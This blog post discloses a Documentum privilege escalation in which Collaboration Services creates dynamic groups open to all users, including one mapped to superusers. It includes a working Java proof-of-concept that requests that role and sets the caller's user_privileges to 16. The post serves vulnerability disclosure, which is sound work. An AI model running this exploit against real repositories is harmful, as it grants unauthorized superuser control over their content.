God bless EMC. Part III

In November 2013 I had noted, that it’s not a good idea to give access to API Tester component in WDK applications to non-privileged users due to following reasons:

In latest wdk patches EMC restricted access to API Tester component, and now only superusers is able to use it:

But I completely missed a fact, that Collaboration Services (which are installed by default) create a lot of dynamic non-protected groups:

Call UpdatePrivGroup( "dce_room_creator", "dm_create_group" )
Call UpdatePrivGroup( "dce_create_room_groups", "dm_create_group" )
Call UpdatePrivGroup( "dce_user_manager", "dm_create_user" )
Call UpdatePrivGroup( "dce_user_manager", "dm_create_cabinet" )
Call UpdatePrivGroup( "dce_datatable_creator", "dm_create_type" )
Call UpdatePrivGroup( "dcs_privileged_users", "dm_superusers" )

Call AddGroupToRole("dce_create_room_groups", "dm_world" )
Call AddGroupToRole("dce_datatable_creator", "dm_world" )
Call AddGroupToRole("dcs_privileged_users", "dm_world" )

Call AddAttributeValueToRole( "dce_datatable_creator", "is_dynamic", "T" )
Call AddAttributeValueToRole( "dce_datatable_creator", "is_module_only", "T" )
Call AddAttributeValueToRole( "dce_datatable_creator", "group_class", "module role" )

Call AddAttributeValueToRole( "dcs_privileged_users", "is_dynamic", "T" )
Call AddAttributeValueToRole( "dcs_privileged_users", "is_module_only", "T" )
Call AddAttributeValueToRole( "dcs_privileged_users", "group_class", "module role" )

Call AddAttributeValueToRole( "dce_room_creator", "is_dynamic", "T" )
Call AddAttributeValueToRole( "dce_room_creator", "is_module_only", "T" )

Call AddAttributeValueToRole( "dce_create_room_groups", "is_dynamic", "T" )
Call AddAttributeValueToRole( "dce_create_room_groups", "is_module_only", "T" )
Call AddAttributeValueToRole("dce_create_room_groups", "group_class", "module role")

Call AddAttributeValueToRole( "dce_user_manager", "is_dynamic", "T" )
Call AddAttributeValueToRole( "dce_user_manager", "is_module_only", "T" )

Call AddGroupAdminToGroup( "dce_create_room_groups", "dce_room_creator" )
Call AddGroupAdminToGroup( "dce_hidden_users", "dce_user_manager" )

This means that in previous releases of WDK applications any user is able to escalate privileges using API Tester component and, moreover, even now if user is able to connect to content server directly he is also able to escalate privileges:

package com.documentum.fc.client.security.impl;

import static java.lang.System.out;

import com.documentum.fc.client.DfClient;
import com.documentum.fc.client.IDfCollection;
import com.documentum.fc.client.IDfSession;
import com.documentum.fc.client.IDfSessionManager;
import com.documentum.fc.common.DfId;
import com.documentum.fc.common.DfList;
import com.documentum.fc.common.DfLoginInfo;
import com.documentum.fc.common.IDfList;
import com.documentum.fc.common.IDfLoginInfo;

public class Test {

    public static void main(String argv[]) throws Exception {
        String docbase = argv[0];
        String username = argv[1];
        String password = argv[2];
        String domain = null;
        if (argv.length == 4) {
            domain = argv[3];
        }

        IDfSessionManager sessionManager = new DfClient().newSessionManager();
        IDfLoginInfo loginInfo = new DfLoginInfo(username, password);
        if (domain != null) {
            loginInfo.setDomain(domain);
        }
        sessionManager.setIdentity(docbase, loginInfo);
        out.println("Connecting to docbase '" + docbase + "' as '" + username
                + "'");
        IDfSession session = sessionManager.getSession(docbase);
        out.println("Connected");
        IDfList arguments = new DfList(new String[] {"QUERY",
            "__REQUESTED_PROTECTED_ROLES", });
        IDfList types = new DfList(new String[] {"S", "S", });
        IDfList values = new DfList(
                new String[] {
                    "update dm_user object set user_privileges=16 where user_name=USER",
                    "dcs_privileged_users", });
        IDfCollection collection = session.apply(DfId.DF_NULLID_STR,
                "EXEC", arguments, types, values);
        if (collection != null && collection.next()) {
            out.println(collection.dump());
        }
        if (collection != null) {
            collection.close();
        }
    }
}

Update

On March 3rd, 2014 EMC announced a fix for taskspace (actually they just restricted access to API Tester), suggested workaround brings me a lot of fun:

4 thoughts on “God bless EMC. Part III

  1. Pingback: CVE-2014-0629 strikes back | Documentum in a (nuts)HELL
  2. Pingback: Weird release management | Documentum in a (nuts)HELL
  3. Pingback: D2 remote code execution | Documentum in a (nuts)HELL
  4. Pingback: When will EMC stop fighting with customers and start care about them? | Documentum in a (nuts)HELL

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s